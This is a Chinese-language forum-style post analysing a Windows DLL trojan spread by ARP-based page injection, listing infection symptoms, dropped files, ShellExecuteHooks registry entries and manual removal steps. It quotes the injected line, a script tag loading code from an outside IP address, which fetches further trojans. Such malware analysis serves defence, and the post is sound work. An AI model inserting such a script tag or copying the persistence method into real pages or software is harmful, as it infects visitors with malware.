变名door0恶意dll木马（arp挂马）详解

煎饼

不是 arp 欺骗  是arp挂马

arp挂马的意思是说 只要你浏览他设定的网页 全部带有挂马信息  如果你在本机开了服务器，别人浏览你的网站 同样会带有挂马信息  但是你打开你本机上的网站源代码却没有这些挂马语句。

我也中了这个木马  不过是在虚拟机下中的 现正在研究中

中毒现象为：
1、用IE内核浏览器浏览百度 瑞星 等等网站时 网页头部会被嵌入
<script src=http://67.19.116.187/1.js>

2、上面那个文件是用来下载其他木马 主木马和所下载木马全为dll木马 主木马只有一个功能：就是进行欺骗 使之下载其他木马
感染主木马后重起一次后生效，开始下载辅助木马，这个主木马也是隐藏最深的。它也会使所有使用javascript的页面受到部分影响比如我的百度空间就 没办法发表文章了。

3、再来说说后来下载的这些辅助木马
        
这些木马位置为：系统盘:\Documents and Settings\当前用户名\Local Settings\Temp 下

    建立 1.exe~11.exe 以及两个~*.tmp文件。
        在%systemroot%下建立
        wodoor0.dll
        dhdoor0.dll
        qjdoor0.dll
        wddoor0.dll
        tldoor0.dll
        zxdoor0.dll
        mydoor0.dll。

        这些dll文件会把自己插入到 explorer 进程中，如果你启动regedit它们同样会被插入到regedit中
        同时在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks 下 建立启动项：
        {08E909A4-B236-48DD-8BCC-90A604B93E68} 数值为：hook tl
        {0DAEBA6A-86CA-4B96-AF96-0C8C2C358FBD} 数值为：hook dh3
        {4E3FBFA4-F1CC-4B66-B333-B9F0FF4B4748} 数值为：hook my
        {5731EA1D-6AAF-4DE9-BDDA-7B390A75B286} 数值为：hook wo
        {6826A3DB-EA8E-4E67-880D-53D04C7C0BD8} 数值为：hook qj
        {781FBCC1-99C7-4AE0-95F7-66EA49E86DD7} 数值为：hook zx

治标不治本的解决办法

1.如果你管理员用户有两个(没有的话现建个)，进入HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks  点右键->权限  找到你当前登陆的用户名 将 完全控制和读取 两个属性 勾上拒绝！ 然后再找到regedit.exe-->创建快捷方式 在属性-->高级里 选上 用其他用户打开 双击这个快捷方式，输入你另一个管理员帐号和密码 把 ShellExecuteHooks 下 那几个键值删除。

2. 和上面同样原理，设置 system32目录的安全选项卡（右键--属性---安全[安全选项只有NTFS分区才有，如果你是NTFS分区又没有安全这一选项，请在"工具-文件夹选项--查看"里把"简单文件共享"前面的点 去掉]）将当前用户权限的 完全控制 点上拒绝，然后找一个能进行文件操作的程序 譬如:冰刃 创建快捷方式，用其他用户打开，然后现在的用户用进程管理器将explorer结束，再然后使用冰刃 删除掉 system32下的那些*hook.dll文件。

3、清空Temp文件夹，删除windows下的~*.tmp文件4、打上系统补丁，使用非IE内核的浏览器上网。

这只是治标不治本的方法，那个主要的病毒依然存在，网页依然有嵌入的挂马语句， 用IE内核浏览器还可能再下载其他病毒。

我发现了几个主病毒的可疑位置，再看看 一会把它们发上来。